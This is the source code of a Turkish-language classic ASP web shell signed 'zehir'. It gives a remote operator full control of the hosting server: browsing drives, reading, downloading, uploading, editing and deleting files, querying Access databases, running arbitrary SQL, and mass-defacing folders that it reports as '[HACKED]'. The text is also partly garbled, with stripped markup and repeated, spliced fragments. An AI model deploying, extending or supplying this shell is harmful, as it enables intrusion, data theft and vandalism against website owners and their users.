<% mpat=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\") dosyaPath = mid(mpat,InStrRev(mpat,"\")+1) on error resume next Dim objFSO,popup Set objFSO = CreateObject ("Scripting.FileSystemObject") if Request("kuskapani")=1 then Response.End end if if Request("kuskapani")=2 then on error resume next path = Request("path") sFolder = Request("SubFolder") fName = Request("FileName") d1 = Request("dosya1") d2 = Request("dosya2") d3 = Request("dosya3") d4 = Request("dosya4") bg__ = Request.Form("selectColour") if bg__ = "0" then bg__ = "#ffffff" byMesaj = "
" & Request("byMesaj") & "" f__ = f__ + 1 else response.Write folderName_ & " [HACKED]
" h__ = h__ + 1 end if Next ss___ = now response.Write "
by zehir!...
Sonuc : Toplam Süre : "&left(ss__-ss___,5)&"sn. ;)
Hacked = "&h__&"
Failed = "&f__ response.End end if status = Request("status") path = Request("path") dPath = Request("dPath") arama = Request("txArama") dkayit = Request("dkayit") table = Request("table") del = Request("del") islem = Request("islem") strSQL = Request("strSQL") cf = Request("cf") pathfile = request("pathfile") if path="" then path=request.servervariables("APPL_PHYSICAL_PATH") if status="" then status=2 popup = true '//////////////////////////////// Function ReadBinaryFile(FileName) Const adTypeBinary = 1 Dim BinaryStream Set BinaryStream = CreateObject("ADODB.Stream") BinaryStream.Type = adTypeBinary BinaryStream.Open BinaryStream.LoadFromFile FileName ReadBinaryFile = BinaryStream.Read End Function if status="-3" then Response.Buffer=True Set Fil = objFSO.GetFile(pathfile) Response.contenttype="application/force-download" Response.AddHeader "Cache-control","private" Response.AddHeader "Content-Length", Fil.Size Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name Response.BinaryWrite readBinaryFile(Fil.path) Set f = Nothing: Set Fil = Nothing response.End() end if '////////////////////////////////// if status="-4" then popup=false if status="13" then popup=false if status="14" then popup=false if status="15" then popup=false if status="16" then popup=false if status="17" then popup=false if status="18" then popup=false if status="19" then popup=false if status="33" then popup=false if status="40" then popup=false if status="50" then popup=false byMsg = request.QueryString("byMsg") if byMsg<>"" then response.Write byMsg response.Write "
"&err.Description Call lobjStream.Close() Set lobjStream = Nothing End Sub Public Property Let FilePath(ByRef pstrPath) mstrPath = pstrPath If Not InStrRev(pstrPath, ".") = 0 Then FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1) FileExt = UCase(FileExt) End If If Not InStrRev(pstrPath, "\") = 0 Then FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1) End If If Not InStrRev(pstrPath, "\") = 0 Then FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1) End If End Property Public Property Get FilePath() FilePath = mstrPath End Property private Function ASCII2Bytes(ByRef pbinBinaryData) Const adLongVarBinary=205 Dim lobjRs Dim llngLength Dim lbinBuffer llngLength = LenB(pbinBinaryData) Set lobjRs = Server.CreateObject("ADODB.Recordset") Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength) Call lobjRs.Open() Call lobjRs.AddNew() Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0)) Call lobjRs.Update() lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength) Call lobjRs.Close() Set lobjRs = Nothing ASCII2Bytes = lbinBuffer End Function Private Function Bytes2Unicode(ByRef pbinBytes) Dim lobjRs Dim llngLength Dim lstrBuffer llngLength = LenB(pbinBytes) Set lobjRs = Server.CreateObject("ADODB.Recordset") Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength) Call lobjRs.Open() Call lobjRs.AddNew() Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes) Call lobjRs.Update() lstrBuffer = lobjRs.Fields("BinaryData").Value Call lobjRs.Close() Set lobjRs = Nothing Bytes2Unicode = lstrBuffer End Function End Class Session("n2") = "ehir" '#################################### function addslash(path) if right(path,1)="\" then addslash=path else addslash=path & "\" end function sub Upload() dim objUpload,f,max,i,name,path,size,success set objUpload=New clsUpload targetPath=objUpload.Fields("folder").Value max=objUpload.Fields("max").Value for i=1 to max name=objUpload.Fields("file" & i).FileName size=objUpload.Fields("file" & i).Length if (name<>"") and (size>0) then gMsg=gMsg & "
" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): " path=addslash(targetPath) & name objUpload.Fields("file" & i).SaveAs path if objFSO.FileExists(path) then on error resume next set f=objFSO.GetFile(path) if IsObject(f) then if f.Size=size then success=true else success=false end if set f=nothing end if if success then gMsg=gMsg & "uploaded" else gMsg = gMsg & "failed!" end if next response.Write gMsg set objUpload=nothing end sub if status="-4" then Upload() ' hataKontrol popup=false end if '//////////////////////////////// sub hataKontrol if err<>0 then Response.Write "Hata : "&err.Description&"" end if end sub sub araBul(path_,ara_) on error resume next If Len(path_) > 0 Then cur = path_&"\" If cur = "\\" Then cur = "" parent = "" If InStrRev(cur,"\") > 0 Then parent = Left(cur, InStrRev(cur, "\", Len(cur)-1)) End If Else cur = "" End If Set f = objFSO.GetFolder(cur) Set fc = f.Files For Each f1 In fc if lcase(InStr(1,f1.name,lcase(ara_)))>0 then downStr = "Í" if lcase(ara_)="mdb" then Response.Write downStr&"û * "&f1.path&" ["&f1.size&"]"&"
" else Response.Write downStr&"û! - "&f1.path&" ["&f1.size&"]"&"
" end if end if Next Set fs = f.SubFolders For Each f1 In fs araBul f1.path,ara_ Next Set f = Nothing Set fc = Nothing Set fs = Nothing end sub sub sistemTest response.Write "
| Konum | Sonuç |
Silme Hakki Yok!" else sonuc__=sonuc__&"
Silme Hakki Var!" end if end if yaziyomu = sonuc__ end function function yaziyomu2(yol) on error goto 0:on error resume next Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True) MyFile.write "byzehir
Parent Folder
Parent Folder
File : "&FormatNumber(int_fil,0)&"
P.Parent Folder
P.Parent Folder
P.Parent Folder
File : "&FormatNumber(int_fil,0)&"
| : Sistem Bilgileri : | |
| Local Adres | " & request.servervariables("REMOTE_ADDR") & " |
| User Agent | " & request.servervariables("HTTP_USER_AGENT") & " |
| Server | " & request.servervariables("SERVER_NAME") & " |
| IP | " & request.servervariables("LOCAL_ADDR") & " |
| HTTPD | " & request.servervariables("SERVER_SOFTWARE") & " |
| Port | " & request.servervariables("SERVER_PORT") & " |
| Yol | " & request.servervariables("APPL_PHYSICAL_PATH") & " |
| Log Root | " & request.servervariables("APPL_MD_PATH") & " |
| HTTPS | " & request.servervariables("HTTPS") & " |
Kaynak : "&path&"
Hedef : "&cf response.Write "
" popup = false hataKontrol CASE 18 'folder Copy window Response.Write "" popup = false hataKontrol CASE 19 'folder Copy isl = "" if islem="kopyala" then objFSO.CopyFolder path,cf isl="kopyalandi.." elseif islem="tasi" then objFSO.MoveFolder path,cf isl="tasindi.." end if response.Write "Klasor "&isl response.Write "
Kaynak : "&path&"
Hedef : "&cf response.Write "
" popup = false hataKontrol CASE 33 'Powered By response.Write "
Powered by Zehir"
response.Write "
zehirhacker@hotmail.com
küllü nefsun zaifetun mevt"
popup = false
hataKontrol
CASE 40 'Sistem Test
sistemTest
popup=false
CASE 50 'Siteleri Test Edelim :D
%>
Güvenlik Testi byZehir
<%
popup=false
CASE 51 ' Özel silemler
END SELECT
%>
<%
if popup then
if status=7 or status=8 then
Response.Write ""
end if
Response.Write "
"
end if
sub aramaUpload
Response.Write ""
%>
<%
end sub
SELECT CASE status
CASE 1 'Driver Open
if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
Response.Write ""
Path = Path & ":/"
Response.Write ""
KlasorOku
Response.Write " "
DosyaOku
Response.Write " "
hataKontrol
CASE 2 'Normal listeleme
if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
Response.Write ""
Response.Write ""
KlasorOku
Response.Write " "
DosyaOku
Response.Write " "
hataKontrol
CASE 3 'File Delete
objFSO.DeleteFile del
hataKontrol
if err<>0 then
byMsg="Not File Deleted!
"
else
byMsg="File Deleted Successful;)
"
end if
Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg
CASE 4 'Folder Delete
objFSO.DeleteFolder del
hataKontrol
if err<>0 then
byMsg="Not Folder Deleted!
"
else
byMsg="Folder Deleted Successful;)
"
end if
Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg
CASE 5 'Dosya içerigini görüntüle
Response.Write ""&path&"
"
Response.Write ""
set f = objFSO.OpenTextFile(path,1)
Response.Write ""&Server.HTMLEncode(f.readAll)&"
"
if err<>62 then hataKontrol
if err.number=62 then Response.Write "":Response.End
CASE 6 'Resim aç
Response.Write "![zehirhacker@hotmail.com / zehirhacker@hotmail.com]("&resimYol(path)&")
"
CASE 7 'database tablo listele
Response.Write "Tablolar
"
Set objConn = Server.CreateObject("ADODB.Connection")
Set objADOX = Server.CreateObject("ADOX.Catalog")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = Path
objConn.Open
objADOX.ActiveConnection = objConn
For Each table in objADOX.Tables
If table.Type = "TABLE" Then
Response.Write "4 "&table.Name&"
"
End If
Next
hataKontrol
CASE 8 'database kayit listele
Set objConn = Server.CreateObject("ADODB.Connection")
Set objRcs = Server.CreateObject("ADODB.RecordSet")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = Path
objConn.Open
objRcs.Open table,objConn, adOpenKeyset , , adCmdText
Response.Write ""
for i=0 to objRcs.Fields.count-1
Response.Write " "&objRcs.Fields(i).Name&" "
next
Response.Write " "
do while not objRcs.EOF
Response.Write ""
for i=0 to objRcs.Fields.count-1
Response.Write ""&objRcs.Fields(i).Value&" "
next
Response.Write " "
objRcs.MoveNext
loop
Response.Write "
"
hataKontrol
CASE 9 'SQL Execute
Set objConn = Server.CreateObject("ADODB.Connection")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = Path
objConn.Open
objConn.Execute strSQL
' Response.Redirect dosyaPath&"?status=7&Path="&Path&"&Time="&time
hataKontrol
CASE 10 'Dosya Editleme
set f = objFSO.OpenTextFile(dPath,1)
Response.Write "
"
else
byMsg = "File Edited Successful:)
"
end if
Response.Redirect dosyaPath&"?status=2&path="&path&"&time="&time&"&byMsg=" & byMsg
CASE 12 'Dosya Arama
araBul path,arama
hataKontrol
END SELECT
Response.Write "
"
sub DosyaOku
Set f = objFSO.GetFolder(Path)
Set fc = f.Files
For Each f1 In fc
dosyaAdi = f1.name
num = InStrRev(dosyaAdi,".")
uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))
downStr = "ûÍ4"
response.Write ""
select case uzanti
case "mdb"
Response.Write ""&f1.name&" ["&FormatNumber(f1.size,0)&"]"&" M "&downStr&"
"
case "asp"
Response.Write ""&f1.name&" ["&FormatNumber(f1.size,0)&"]"&" ± !"&downStr&"
"
case "jpg","gif"
Response.Write ""&f1.name&" ["&FormatNumber(f1.size,0)&"]"&" ¢ "&downStr&"
"
case else
Response.Write ""&f1.name&" ["&FormatNumber(f1.size,0)&"]"&" 2 !"&downStr&"
"
end select
Next
end sub
sub KlasorOku
Set f = objFSO.GetFolder(Path)
Set fc = f.SubFolders
if session("klasoroku")="" then
response.Write ""
session("klasoroku")="simdi yaziliyor"
end if
For Each f1 In fc
Response.Write "4 û 1"&f1.name&"
"
Next
end sub
function createFileName()
Randomize
fName_ = ""
for i=1 to 10
fName_ = fName_ & int(Rnd*100)
next
createFileName = fName_
end function
function resimYol(path_)
on error resume next
path_ = Replace(Replace(path_,"\","/"),"//","/")
lpath_ = left(request.servervariables("PATH_TRANSLATED"),instrrev(request.servervariables("PATH_TRANSLATED"),"\"))
if yaziyomu2(lpath_) then
fname__ = "0"&createFileName()&"."&Right(path_,3)
objFSO.CopyFile path_, lpath_&"\"&fname__
else
Response.Write("Resim Açilamiyor..
Isterseniz Download Ederek görüntüleyebilirsiniz..")
end if
resimYol = fname__
end function
if not popup then
Set fc = Nothing
Set objFSO = Nothing
Response.End
end if
%>
<%
Response.Write "Sürücüler "
Response.write ";"
if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]"
if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.DriveLetter & ":]"
if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter & ":]"
if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]"
Response.Write " "
Response.write "H Local Path"
Response.Write "
"
Set fc = Nothing
Set objFSO = Nothing
Response.End%>
| " KlasorOku Response.Write " | " DosyaOku Response.Write " | " hataKontrol CASE 3 'File Delete objFSO.DeleteFile del hataKontrol if err<>0 then byMsg="Not File Deleted!
"
set f = objFSO.OpenTextFile(path,1)
Response.Write ""&Server.HTMLEncode(f.readAll)&"" if err<>62 then hataKontrol if err.number=62 then Response.Write "":Response.End CASE 6 'Resim aç Response.Write " " CASE 7 'database tablo listele Response.Write "Tablolar " Set objConn = Server.CreateObject("ADODB.Connection") Set objADOX = Server.CreateObject("ADOX.Catalog") objConn.Provider = "Microsoft.Jet.Oledb.4.0" objConn.ConnectionString = Path objConn.Open objADOX.ActiveConnection = objConn For Each table in objADOX.Tables If table.Type = "TABLE" Then Response.Write "4 "&table.Name&" " End If Next hataKontrol CASE 8 'database kayit listele Set objConn = Server.CreateObject("ADODB.Connection") Set objRcs = Server.CreateObject("ADODB.RecordSet") objConn.Provider = "Microsoft.Jet.Oledb.4.0" objConn.ConnectionString = Path objConn.Open objRcs.Open table,objConn, adOpenKeyset , , adCmdText Response.Write "
" hataKontrol CASE 9 'SQL Execute Set objConn = Server.CreateObject("ADODB.Connection") objConn.Provider = "Microsoft.Jet.Oledb.4.0" objConn.ConnectionString = Path objConn.Open objConn.Execute strSQL ' Response.Redirect dosyaPath&"?status=7&Path="&Path&"&Time="&time hataKontrol CASE 10 'Dosya Editleme set f = objFSO.OpenTextFile(dPath,1) Response.Write " " else byMsg = "File Edited Successful:) " end if Response.Redirect dosyaPath&"?status=2&path="&path&"&time="&time&"&byMsg=" & byMsg CASE 12 'Dosya Arama araBul path,arama hataKontrol END SELECT Response.Write " |
" case "asp" Response.Write ""&f1.name&" ["&FormatNumber(f1.size,0)&"]"&" ± !"&downStr&"
" case "jpg","gif" Response.Write ""&f1.name&" ["&FormatNumber(f1.size,0)&"]"&" ¢ "&downStr&"
" case else Response.Write ""&f1.name&" ["&FormatNumber(f1.size,0)&"]"&" 2 !"&downStr&"
" end select Next end sub sub KlasorOku Set f = objFSO.GetFolder(Path) Set fc = f.SubFolders if session("klasoroku")="" then response.Write "" session("klasoroku")="simdi yaziliyor" end if For Each f1 In fc Response.Write "4 û 1"&f1.name&"
" Next end sub function createFileName() Randomize fName_ = "" for i=1 to 10 fName_ = fName_ & int(Rnd*100) next createFileName = fName_ end function function resimYol(path_) on error resume next path_ = Replace(Replace(path_,"\","/"),"//","/") lpath_ = left(request.servervariables("PATH_TRANSLATED"),instrrev(request.servervariables("PATH_TRANSLATED"),"\")) if yaziyomu2(lpath_) then fname__ = "0"&createFileName()&"."&Right(path_,3) objFSO.CopyFile path_, lpath_&"\"&fname__ else Response.Write("Resim Açilamiyor..
Isterseniz Download Ederek görüntüleyebilirsiniz..") end if resimYol = fname__ end function if not popup then Set fc = Nothing Set objFSO = Nothing Response.End end if %> <% Response.Write "
| Sürücüler |
| " Response.write ";" if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]" if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.DriveLetter & ":]" if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter & ":]" if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]" Response.Write " |
| " Response.write "H Local Path" Response.Write " |
" Set fc = Nothing Set objFSO = Nothing Response.End%>